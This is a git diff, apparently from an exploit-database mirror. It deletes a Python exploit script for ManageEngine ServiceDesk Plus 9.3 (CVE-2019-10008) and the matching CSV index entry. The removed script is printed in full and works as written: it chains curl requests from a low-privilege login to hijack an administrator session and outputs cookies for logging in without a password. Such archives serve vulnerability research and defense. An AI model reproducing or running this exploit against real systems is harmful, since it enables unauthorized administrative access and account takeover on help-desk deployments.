diff --git a/exploits/windows/webapps/46659.py b/exploits/windows/webapps/46659.py deleted file mode 100755 index f41dde33b..000000000 --- a/exploits/windows/webapps/46659.py +++ /dev/null @@ -1,180 +0,0 @@ -#!/usr/bin/python - -# Exploit Title: Manage Engine ServiceDesk Plus Version 9.3 Privileged Account Hijacking -# Date: 30-03-2019 -# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız -# Vendor: ManageEngine -# Vendor Homepage: www.manageengine.com -# Product: Service Desk Plus -# Version: 9.3 -# Tested On: Windows 10 64 bit -# CVE : 2019-10008 - - -# How to use: Change the host, low_username, low_password and high_username variables depending on what you have. -# Low username and password is an account you have access to. high_username is account you want to authenticate as. - -# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password. -# Run this script on a Linux OS. - -#Host ip address + port -host="localhost:8080" - -#set to https if needed -url = "http://" + host - -#Username with credentials you have -low_username="guest" -low_password="guest" - -#username you want to login as -high_username="administrator" - - - - - -print("\033[1;37mUrl: \033[1;32m" + url) -print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password) -print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username) - - -print("\033[1;32mGetting a session id\033[1;37m") - -# Get index page to capture a session id -curl = "curl -i -s -k -X $'GET' \ - -H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\ - $'"+url+"/'" - -out = os.popen('/bin/bash -c "' + curl+'"').read() -sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] - -print("Sessid:") -print(sessid) - - -print("\033[1;31mLogging in with low privilege user\033[1;37m") - - -#Attempt login post request -curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\ - -H $'Referer: "+url+"/'\ - -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ - -b $'JSESSIONID="+sessid+"' \ - --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\ - hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\ - dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \ - $'"+url+"/j_security_check'" - -out = os.popen('/bin/bash -c "' + curl+'"').read() - - -#Instead of following redirects with -L, following manually because we don't need all the transactions. -curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\ - -H $'Referer: "+url+"/'\ - -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \ - -b $'JSESSIONID="+sessid+"' \ - $'"+url+"/'" - -out = os.popen('/bin/bash -c "' + curl+'"').read() - -print("\033[1;32mCaptured authenticated cookies.\033[1;37m") -sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] -print(sessid) -sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] -print(sessidsso) -grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out) - -grbl2 = [] -for cookie in grbl: - cl = cookie.split('=') - if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem': - - grbl2.append(cl[0]) - grbl2.append(cl[1]) - -curl = "curl -i -s -k -X $'GET' \ - -H $'Host: "+host+"' \ - -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - $'"+url+"/mc/'" - - -out = os.popen('/bin/bash -c "' + curl+'"').read() -sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] - -print("\033[1;32mCaptured secondary sessid.\033[1;37m") -print(sessid2) - - -print("\033[1;31mDoing the magic step 1.\033[1;37m") -curl = "curl -i -s -k -X $'GET' \ - -H $'Host: "+host+"' \ - -H $'Referer: "+url+"/mc/WOListView.do' \ - -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - $'"+url+"/mc/jsp/MCLogOut.jsp'" - -out = os.popen('/bin/bash -c "' + curl+'"').read() - -print("\033[1;31mDoing the magic step 2.\033[1;37m") - - - - -curl = "curl -i -s -k -X $'GET' \ - -H $'Host: "+host+"' \ - -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - $'"+url+"/mc/jsp/MCDashboard.jsp'" - - -out = os.popen('/bin/bash -c "' + curl+'"').read() - -sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] -sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] - - -curl = "curl -i -s -k -X $'GET' \ - -H $'Host: "+host+"' \ - -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - $'"+url+"/'" - -out = os.popen('/bin/bash -c "' + curl+'"').read() -sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] - - -curl = "curl -i -s -k -X $'POST' \ - -H $'"+host+"' \ - -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ - -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \ - $'"+url+"/mc/j_security_check'" - - -out = os.popen('/bin/bash -c "' + curl+'"').read() - -curl = "curl -i -s -k -X $'GET' \ - -H $'Host: "+host+"' \ - -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \ - -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - -H $'Upgrade-Insecure-Requests: 1' \ - -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \ - $'"+url+"/mc/jsp/MCDashboard.jsp'" - - - -out = os.popen('/bin/bash -c "' + curl+'"').read() - - -sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0] -sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0] - -print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m") -print("JSESSIONID=" + sessidhigh) -print("JSESSIONIDSSO=" + sessidssohigh) -print(grbl2[0] + "=" + grbl2[1]) -print(grbl2[2] + "=" + grbl2[3]) -print("_rem=true") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5a50ea2fd..281cb0a75 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41112,7 +41112,6 @@ id,file,description,date,author,type,platform,port 46643,exploits/php/webapps/46643.txt,"Ashop Shopping Cart Software - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80 46644,exploits/php/webapps/46644.txt,"PhreeBooks ERP 5.2.3 - Arbitrary File Upload",2019-04-03,"Abdullah Çelebi",webapps,php,80 46658,exploits/php/webapps/46658.py,"FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)",2019-04-04,"Yilmaz Degirmenci",webapps,php,80 -46659,exploits/windows/webapps/46659.py,"Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation",2019-04-05,"Ata Hakçıl_ Melih Kaan Yıldız",webapps,windows, 46661,exploits/php/webapps/46661.html,"WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery",2019-04-05,"Peyman Forouzan",webapps,php, 46663,exploits/php/webapps/46663.txt,"Jobgator - 'experience' SQL Injection",2019-04-08,"Ahmet Ümit BAYRAM",webapps,php,80 46664,exploits/php/webapps/46664.html,"Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution",2019-04-08,FelipeGaspar,webapps,php,80